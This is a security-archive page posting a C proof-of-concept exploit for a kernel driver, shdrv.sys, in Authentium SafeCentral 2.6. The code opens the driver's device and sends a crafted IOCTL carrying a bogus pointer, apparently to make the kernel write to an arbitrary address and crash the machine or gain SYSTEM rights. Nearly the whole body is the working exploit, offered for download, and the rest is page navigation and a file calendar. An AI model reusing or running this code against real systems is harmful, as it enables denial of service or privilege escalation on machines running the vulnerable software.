what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Authentium SafeCentral 2.6 shdrv.sys Local Kernel ring0 SYSTEM Exploit

Authentium SafeCentral 2.6 shdrv.sys Local Kernel ring0 SYSTEM Exploit
Posted Jan 17, 2010
Authored by mu-b | Site digit-labs.org

Authentium SafeCentral versions 2.6 and below shdrv.sys local kernel ring0 SYSTEM proof of concept exploit.

tags | exploit, kernel, local, proof of concept
SHA-256 | 8f6b53bec0baf3a2811e603e635dfdd97de8915bec32e2210c5912e42d0adf9f

Authentium SafeCentral 2.6 shdrv.sys Local Kernel ring0 SYSTEM Exploit

Change Mirror Download
/* safecentral-unharden.c
*
* Copyright (c) 2009 by <mu-b@digit-labs.org>
*
* Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM POC
* by mu-b - Tue 1 Sep 2009
*
* - Tested on: shdrv.sys 2.0.0.128
*
* Compile: MinGW + -lntdll
*
* - this exploit is provided for educational purposes _only_. You are free
* to use this code in any way you wish provided you do not work for, or
* are associated in any way with Portcullis Computer Security Ltd.
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
*/

#include <stdio.h>
#include <stdlib.h>

#include <windows.h>

#define SAFECNTRL_IOCTL 0x00226003

struct ioctl_req {
DWORD action;
DWORD *args;
DWORD *result;
};

int
main (int argc, char **argv)
{
struct ioctl_req req;
HANDLE hFile, hEvent;
OVERLAPPED olStruct;
BOOL bResult;
DWORD args[2], rlen;

printf ("Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM PoC\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");

fflush (stdout);
hFile = CreateFileA ("\\\\.\\ShDev", GENERIC_READ,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}

memset (&req, 0, sizeof req);
req.action = 8;
req.args = args;
req.result = (DWORD *) 0xDEADBEEF;

memset (&olStruct, 0, sizeof olStruct);
olStruct.hEvent = CreateEventW (NULL, TRUE, FALSE, NULL);
if (!olStruct.hEvent)
{
fprintf (stderr, "* CreateEventW failed\n");
exit (EXIT_FAILURE);
}

bResult = DeviceIoControl (hFile, SAFECNTRL_IOCTL,
&req, sizeof req, NULL, 0, &rlen, &olStruct);
if (!bResult)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}

bResult = GetOverlappedResult (hFile, &olStruct, &rlen, 1);
if (!bResult)
{
fprintf (stderr, "* GetOverlappedResult failed\n");
exit (EXIT_FAILURE);
}

printf ("* hmmm, you didn't STOP the box?!?!\n");

CloseHandle (hFile);

return (EXIT_SUCCESS);
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close